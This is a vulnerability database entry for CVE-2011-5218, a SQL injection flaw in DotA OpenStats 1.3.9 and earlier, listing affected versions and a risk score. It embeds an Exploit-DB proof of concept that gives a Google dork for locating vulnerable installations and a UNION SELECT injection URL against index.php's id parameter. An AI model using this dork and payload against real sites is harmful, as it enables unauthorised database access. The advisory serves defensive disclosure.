CVE-2011-5218

high
Published 2012-10-25 ยท Modified 2026-04-29
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
8.5

Description

SQL injection vulnerability in DotA OpenStats 1.3.9 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter to index.php.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-18250 webapps php verified text ยท 1 KB
HvM17 ยท 2011-12-19

DotA OpenStats 1.3.9 - SQL Injection

text exploit Source: Exploit-DB
=============
# Exploit Title: DotA OpenStats SQL Injection Vulnerability
# Google Dork: "ยฉ 2011 Powered by DotA OpenStats"
# Date: 19/12/2011
# Author: HvM17
# Version: 1.3.9 and below
# Tested on: WinXP

=============
# VenDor : http://openstats.iz.rs/
# Download script: https://sourceforge.net/projects/dotaopenstats/
=============

[~] Exploit
		
		http://localhost/dotaStats/index.php?id='1 UNION SELECT 1,2,3,4
		
============
Made IN INDONESIA
Greetz for All HVM crew :)
============

Application impact

VendorProductVersionsFixed
neubivljivdota_openstats{"endIncluding":"1.3.9"}
neubivljivdota_openstats1.1
neubivljivdota_openstats1.1.9
neubivljivdota_openstats1.2.1
neubivljivdota_openstats1.2.2
neubivljivdota_openstats1.2.3
neubivljivdota_openstats1.2.4
neubivljivdota_openstats1.2.5
neubivljivdota_openstats1.2.6
neubivljivdota_openstats1.2.7
neubivljivdota_openstats1.2.8
neubivljivdota_openstats1.2.9
neubivljivdota_openstats1.3.0
neubivljivdota_openstats1.3.1
neubivljivdota_openstats1.3.2
neubivljivdota_openstats1.3.3
neubivljivdota_openstats1.3.4
neubivljivdota_openstats1.3.5
neubivljivdota_openstats1.3.6
neubivljivdota_openstats1.3.7
neubivljivdota_openstats1.3.8

References

CWEs

CWE-89

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.